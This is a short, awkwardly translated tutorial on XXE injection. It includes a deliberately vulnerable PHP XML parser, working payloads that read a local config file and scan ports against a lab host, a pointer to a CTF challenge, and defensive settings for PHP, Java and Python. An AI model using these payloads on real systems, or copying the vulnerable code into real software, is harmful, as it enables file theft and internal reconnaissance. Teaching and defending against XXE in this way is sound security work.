XXE Vulnerability
XXE stands for XML External Entity Injection vulnerability that is xml external entity injection vulnerability, XXE vulnerabilities occur when the application parses the XML input, there is no prohibition to load external entity, leading to load malicious external file, causing the file to read, command execution, network port scanning, network sites in the attack, launched dos attacks and other hazards. Xxe vulnerability trigger point often can upload the xml file location, no xml file upload filtering, leading to upload malicious xml file.
Similar to the file that contains the vulnerability - by loading the XML file and call the configuration file to implement injection
Create a loophole in the code:
<?php
$xml=$_GET['x'];
$data=simplexml_load_file($xml);
var_dump($data);
?>
simplexml_load_file
php resolve external entity shall php << 5.5.38
Read arbitrary files
Reading the file.xml
code is as follows:
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY file SYSTEM "file:///c:/config.ini">
]>
<x>&file;</x>
<!-- 引用外部实体 -->
access http://192.168.80.128/test/xml/test.php?x=file.xml
Port Scan
Read port.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root[
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root>
<name>&xxe;</name>
</root>
access http://192.168.80.128/test/xml/test.php?x=port.xml
No error, indicates that the interface and open
If the port to be non-existent 180
access http://192.168.80.128/test/xml/test.php?x=port.xml
A CTF title
http://web.jarvisoj.com:9882/
- Return information json format
- Then burp packet capture analysis
- Try to inject xml, retransmission packet capture
XML use the back door
php dynamically create xml, backdoor
Defense XXE attack
Use development language provide a method to disable external entities
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
Filtering XML data submitted by users
Filter (s): <DOCTYPE and <ENTITY, or, SYSTEM and PUBLIC!!.
It does not allow XML DTD contains its own definition of
https://www.cnblogs.com/miyeah/p/4526088.html
The introduction of an external DTD file
Writing XML code injection
access http://192.168.80.128/test/xml/test.php?x=xxe-dtd.xml
File information can be read out using the read file reached